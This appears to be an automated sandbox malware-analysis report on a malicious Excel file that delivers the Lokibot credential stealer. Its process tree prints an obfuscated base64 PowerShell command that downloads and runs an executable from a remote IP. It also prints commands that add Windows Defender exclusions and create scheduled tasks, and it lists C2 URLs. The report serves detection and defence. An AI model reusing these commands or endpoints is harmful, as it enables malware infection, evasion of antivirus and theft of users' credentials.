Edit tour

Windows Analysis Report
Payment Advice.xls

Overview

General Information

Sample name:	Payment Advice.xls
Analysis ID:	1559865
MD5:	5a69ac58c3133e24a783cf4ea670a243
SHA1:	7fdf7feed6f105ce6bfeb34fb44c9c58dfe9057e
SHA256:	f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d
Infos:

Detection

HTMLPhisher, Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected HtmlPhish44

Yara detected Lokibot

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Document exploit detected (process start blacklist hit)

Excel sheet contains many unusual embedded objects

Injects a PE file into a foreign processes

Installs new ROOT certificates

Machine Learning detection for dropped file

Machine Learning detection for sample

Microsoft Office drops suspicious files

PowerShell case anomaly found

Powershell drops PE file

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: File With Uncommon Extension Created By An Office Application

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Compiles C# or VB.Net code

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Document contains embedded VBA macros

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Searches the installation path of Mozilla Firefox

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Excel Network Connections

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Office Outbound Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 3400 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

mshta.exe (PID: 3644 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)

powershell.exe (PID: 3756 cmdline: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)

powershell.exe (PID: 3896 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment MD5: A575A7610E5F003CC36DF39E07C4BA7D)

csc.exe (PID: 3992 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)

cvtres.exe (PID: 4000 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1ED7.tmp" "c:\Users\user\AppData\Local\Temp\fkur3fvp\CSC55312E8BACB34CD3B1B97BFED1B34D9.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

caspol.exe (PID: 3064 cmdline: "C:\Users\user\AppData\Roaming\caspol.exe" MD5: 74061922F1E78C237A66D12A15A18181)

powershell.exe (PID: 1888 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

powershell.exe (PID: 1520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

schtasks.exe (PID: 1392 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp9F6B.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

caspol.exe (PID: 3232 cmdline: "C:\Users\user\AppData\Roaming\caspol.exe" MD5: 74061922F1E78C237A66D12A15A18181)

AcroRd32.exe (PID: 3136 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)

mshta.exe (PID: 3768 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)

powershell.exe (PID: 532 cmdline: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)

powershell.exe (PID: 2760 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment MD5: A575A7610E5F003CC36DF39E07C4BA7D)

csc.exe (PID: 3300 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4i1jhsy0\4i1jhsy0.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)

cvtres.exe (PID: 2584 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8B10.tmp" "c:\Users\user\AppData\Local\Temp\4i1jhsy0\CSC6DB7E53F49C54638AC449C3AA969DEC.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

caspol.exe (PID: 956 cmdline: "C:\Users\user\AppData\Roaming\caspol.exe" MD5: 74061922F1E78C237A66D12A15A18181)

powershell.exe (PID: 768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

powershell.exe (PID: 1520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

schtasks.exe (PID: 2076 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpF9BA.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

caspol.exe (PID: 3780 cmdline: "C:\Users\user\AppData\Roaming\caspol.exe" MD5: 74061922F1E78C237A66D12A15A18181)

taskeng.exe (PID: 1404 cmdline: taskeng.exe {6A6C3D45-060E-4891-98BB-3A2AADA7326E} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)

rrwscqkDSNwLK.exe (PID: 2148 cmdline: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe MD5: 74061922F1E78C237A66D12A15A18181)

powershell.exe (PID: 1600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

powershell.exe (PID: 3588 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

schtasks.exe (PID: 3580 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpBD09.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

rrwscqkDSNwLK.exe (PID: 1840 cmdline: "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe" MD5: 74061922F1E78C237A66D12A15A18181)

rrwscqkDSNwLK.exe (PID: 1988 cmdline: "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe" MD5: 74061922F1E78C237A66D12A15A18181)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/simple/five/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].hta	JoeSecurity_HtmlPhish_44	Yara detected HtmlPhish_44	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
0000000B.00000002.480373676.00000000036E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000B.00000002.480373676.00000000036E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000B.00000002.480373676.00000000036E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.480373676.00000000036E9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x18040:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000B.00000002.480373676.00000000036E9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x540b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000B.00000002.480373676.00000000036E9000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13c4f:$des3: 68 03 66 00 00 0x18040:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1810c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000B.00000002.480373676.00000000036CF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000B.00000002.480373676.00000000036CF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000B.00000002.480373676.00000000036CF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.480373676.00000000036CF000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x18020:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000B.00000002.480373676.00000000036CF000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53eb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000B.00000002.480373676.00000000036CF000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13c2f:$des3: 68 03 66 00 00 0x18020:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x180ec:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0xc2758:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0xafb0b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0xbe34f:$des3: 68 03 66 00 00 0xc2758:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0xc2824:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000014.00000002.634660515.0000000000854000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
0000000B.00000002.477095968.0000000002521000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000B.00000002.477095968.0000000002521000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000B.00000002.477095968.0000000002521000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.477095968.0000000002521000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0xc4aa8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000B.00000002.477095968.0000000002521000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0xb1e5b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000B.00000002.477095968.0000000002521000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0xc069f:$des3: 68 03 66 00 00 0xc4aa8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0xc4b74:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: caspol.exe PID: 3064	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: caspol.exe PID: 3064	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: caspol.exe PID: 3064	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x69feb:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x762ac:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x7a5b8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: caspol.exe PID: 3232	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: rrwscqkDSNwLK.exe PID: 2148	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: rrwscqkDSNwLK.exe PID: 2148	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: rrwscqkDSNwLK.exe PID: 2148	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x3fc14:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: rrwscqkDSNwLK.exe PID: 1988	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: rrwscqkDSNwLK.exe PID: 1988	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: rrwscqkDSNwLK.exe PID: 1988	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x2ccc:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 38 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
31.2.rrwscqkDSNwLK.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
31.2.rrwscqkDSNwLK.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
31.2.rrwscqkDSNwLK.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
31.2.rrwscqkDSNwLK.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
31.2.rrwscqkDSNwLK.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
31.2.rrwscqkDSNwLK.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
